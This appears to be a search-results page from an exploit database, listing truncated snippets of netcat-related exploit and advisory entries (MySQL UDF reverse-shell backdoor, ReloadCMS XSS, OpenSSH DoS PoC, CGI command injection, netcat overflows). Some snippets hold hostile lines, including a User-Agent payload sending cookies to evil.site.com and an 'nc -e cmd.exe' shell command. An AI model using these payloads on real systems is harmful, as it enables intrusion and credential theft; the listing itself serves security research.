695 matches found
Immunity Canvas: SNORTRPC
Name| snortrpc ---|--- CVE| CVE-2006-5276 Exploit Pack| CANVAS Description| Snort RPC Notes| CVE Name: CVE-2006-5276 VENDOR: SourceFire Notes: This version of the exploit needs to connect to a port 139 Note that it does not need to be an actual Netbios target. Something like a netcat listener wil...
MySQL 4.x5.0 (Windows) - User-Defined Function Command Execution
MySQL 4.x5.0 Windows - User-Defined Function Command Execution -- raptorwinudf.sql - A MySQL UDF backdoor kit for Windows -- Copyright c 2007 Marco Ivaldi -- -- This is a MySQL backdoor kit for Windows based on the UDFs User Defined -- Functions mechanism. Use it to spawn a reverse shell netcat U...
MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution
-- raptorwinudf.sql - A MySQL UDF backdoor kit for Windows -- Copyright c 2007 Marco Ivaldi -- -- This is a MySQL backdoor kit for Windows based on the UDFs User Defined -- Functions mechanism. Use it to spawn a reverse shell netcat UDF on port -- 80/tcp or to execute single OS commands exec UDF...
PHP and ASP upload vulnerability explore-exploit warning-the black bar safety net
1 pass exploit the principles just for the form format of the upload of asp and php scripts ncnetcat For the submission packet the dos interface to run under: nc-vv www.. com 8 01.txt -vv: echo 8 0: the www port 1.txt: is your data packet to be transmitted use of more methods, please check this...
Teach you to retrieve Windows NT Admin rights on the method-vulnerability warning-the black bar safety net
One, by modifying the registry Those who have logged on NT the machine of the user, for example, IUSRmachine, have to HKEYLOCALMACHINE\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run item Read and write permissions, the user can remotely access This item. For example, he can create a bat file, the...
ColdFusion MX Remote Development Service Exploit
No description provided by source. !/usr/bin/perl RDScDump.pl By angry packet THIS IS AN UNPATCHED VULNERABILITY - THIS IS AN UNPATCHED VULNERABILITY ColdFusion 6 MX Server does several things in order to get remote dir structure so we will need to recreate these functions. This is a "almost"...
openssh43p1DoS.txt
!/bin/bash OpenSSH CRC compensation attack detection DoS PoC. Tavis Ormandy Yes, I really did implement crc-32 in bash. usage: script victim hostname hostname=$1:-localhost port=$2:-22 where the fifo is created to communicate with netcat fifo=/tmp/nc.$$ make the fifos mkfifo $fifo.in mkfifo...
OpenSSH 4.3 p1 - Duplicated Block Remote Denial of Service
OpenSSH 4.3 p1 - Duplicated Block Remote Denial of Service !/bin/bash OpenSSH CRC compensation attack detection DoS PoC. Tavis Ormandy Yes, I really did implement crc-32 in bash. usage: script victim hostname hostname=$1:-localhost port=$2:-22 where the fifo is created to communicate with netcat...
ReloadCMS-1.2.5.txt
nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent: "window.open"http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL;window.close; Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once...
ReloadCMS <= 1.2.5stable Cross site scripting / remote command execution
?php / ReloadCMS = 1.2.5stable Cross site scripting / remote command execution software site: http://reloadcms.com/ description: "ReloadCMS is a free CMS written on PHP and based on flat files." vulnerability: ReloadCMS do not properly sanitize User-Agent request header before to store it in...
ReloadCMS 1.2.5 - Cross-Site Scripting / Remote Code Execution
nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent: "window.open"http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL;window.close; Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once...
bizdb1-search.cgi located
BizDB is a web database integration product using Perl CGI scripts. One of the scripts, bizdb-search.cgi, passes a variable's contents to an unchecked open call and can therefore be made to execute commands at the privilege level of the webserver. The variable is dbname, and if passed a semicolon...
Astaro Security Linux 6.0 - HTTP CONNECT Access Localhost Weakness
Astaro Security Linux 6.0 - HTTP CONNECT Access Localhost Weakness ================================================================== Product: ======== Astaro Security Linux 6.0 is a network security solution, including a combination of the following security applications: - Stateful inspection...
eXtropia Shopping Cart - 'web_store.cgi' Remote Command Execution
!/usr/bin/perl -w Remote Command Execution Vulnerability In Webstore.cgi SegmentationFault Group Greetz to : Xsupr3mo - failed - Status-x - Stealh - P3S4D3L0 Greetz to : berhooz - nima - ehsan - Unknown OutLaw eutanasia www.ashiyane.com ok setp by setp to work : start exploit If connect back shel...
sonicwallXSS.txt
SonicWALL SOHO/10 - XSS and Code Injection vulnerability ======================================================== Product: ======== SonicWall SOHO/10 is the 2nd generation Internet Security Appliance from Sonicwall, with firewall-, vpn-, contentfiltering- and other capabilities. Vulnerability:...
NetCat for Windows buffer overflow
Remote buffer overflow if netcat is used in supersever mode -e option...
NetCat V 1.11 Multiple Bugs
Hello the nc V1.11 is bugged execute nc -p 777 -L -e cmd.exe create te file prova.txt and insert...
netcat-exp.txt
December 26, 2004 Hat-Squad Advisory: Remote buffer overflow in Netcat TCP/IP Swiss Army Knife Product: Netcat - nc11nt.zip Vendor Url: http://www.securityfocus.com/tools/139/scoreit Version: Netcat v1.1 Vulnerability: Remote stack overflow in the DNS control part Release Date: 26 December, 2004...
CVE-2004-1317
Stack-based buffer overflow in doexec.c in Netcat for Windows 1.1, when running with the -e option, allows remote attackers to execute arbitrary code via a long DNS command...
CVE-2004-1317
Stack-based buffer overflow in doexec.c in Netcat for Windows 1.1, when running with the -e option, allows remote attackers to execute arbitrary code via a long DNS command...